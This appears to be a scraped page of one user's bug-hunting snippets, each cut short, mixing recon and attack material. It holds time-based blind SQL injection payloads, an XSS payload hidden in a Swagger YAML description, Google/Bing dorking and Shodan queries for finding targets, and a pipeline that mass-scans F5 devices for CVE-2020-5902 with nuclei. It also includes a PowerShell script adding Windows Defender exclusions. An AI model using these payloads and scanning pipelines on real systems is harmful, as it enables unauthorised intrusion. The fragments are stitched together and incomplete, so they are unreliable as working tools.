marz-hunter

 AND sleep(20)#
'%2b(select*from(select(sleep(20)))a)%2b'
0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z

marz-hunter

"""

***** Auto-finder by dorks tool with Google API & Bing API *****

@author: z0rtecx
@release date: dec-2014
@version: 1.0.12122014
@poc: good dork for find web pages whit SQLi vulnerability in ID parameter, e.g. "inurl:details.php?id="
@description: This tool is for save time for you. It is gathering dorks of a txt file, and search potential web pages with SQLi vulnerability. ONLY FOR MySQL errors.
@features: 

marz-hunter

org: org_name
kibana content-length:217
org:”Amazon” ssl:”target”
ssl:”target”
html:”Dashboard Jenkins” http.component:”jenkins”
http.title:”302 Found”
http.component%3A”java”
https://www.shodan.io/host/ip#9200
https://www.shodan.io/host/ip
X-Redirect-By: WordPress ssl:”name”

marz-hunter

# !/usr/bin/env python
# sslChainDeetz.py
#
# Dependencies:
# - shodan
# - pyOpenSSL
#
# Installation:
# sudo easy_install shodan
#

marz-hunter

swagger: '2.0'
info:
  title: XSS yaml.spec
  description: |
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(document.domain)'>">
paths:
  /accounts:
    get:
      responses:
        '200':

marz-hunter

# Get all the F5 IPs from Shodan | Get script here : https://gist.github.com/LuD1161/2087aea80e8771a4af069c33b4078570
python3 shodan_query.py "http.favicon.hash:-335242539" results_f5.txt | tee -a output.txt

cat output.txt | grep -i "host :" | cut -d":" -f2 | cut -d" " -f2 | httpx -threads 400 -ports 80,443,8443,4443 -silent | nuclei -t cves/CVE-2020-5902.yaml -o results.txt

cut -d" " -f3 results.txt > targets.txt
sed -i -e "s/\.\;/\.\\\;/g" targets.txt # escape semicolon to pass to interlace

interlace -tL ./targets.txt -threads 100 -c "echo _target_; curl --insecure -v _target_ 2>&1 | awk 'BEGIN { cert=0 } /^\* SSL connection/ { cert=1 } /^\*/ { if (cert) print }'" -v | tee -a all_certs.txt

marz-hunter

(() => {
  let gadgets = [];

  if (typeof _satellite !== 'undefined') {
    gadgets.push('Adobe Dynamic Tag Management');
  }

  if (typeof BOOMR !== 'undefined') {
    gadgets.push('Akamai Boomerang');
  }

marz-hunter

############
# You should be aware that this could make your system less secure. Use at your own risk.
# Note: This should be run from an administrative PowerShell prompt
############

# Find registered WSL environments
$wslPaths = (Get-ChildItem HKCU:\Software\Microsoft\Windows\CurrentVersion\Lxss | ForEach-Object { Get-ItemProperty $_.PSPath}).BasePath

# Get the current Windows Defender exclusion paths
$currentExclusions = $(Get-MpPreference).ExclusionPath

marz-hunter

{
    "proxy":{
        "ssl_pass_through":{
            "automatically_add_entries_on_client_ssl_negotiation_failure":false,
            "rules":[
                {
                    "enabled":true,
                    "host":".*\\.google\\.com",
                    "protocol":"any"
                },

marz-hunter

import httplib
import urllib

http = httplib.HTTPSConnection('example.com', 443)

cookie = 'your=cookies';

http.request("GET", "/api/v1/csrf", "", {
    'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36',
    'referer': 'https://example.com/',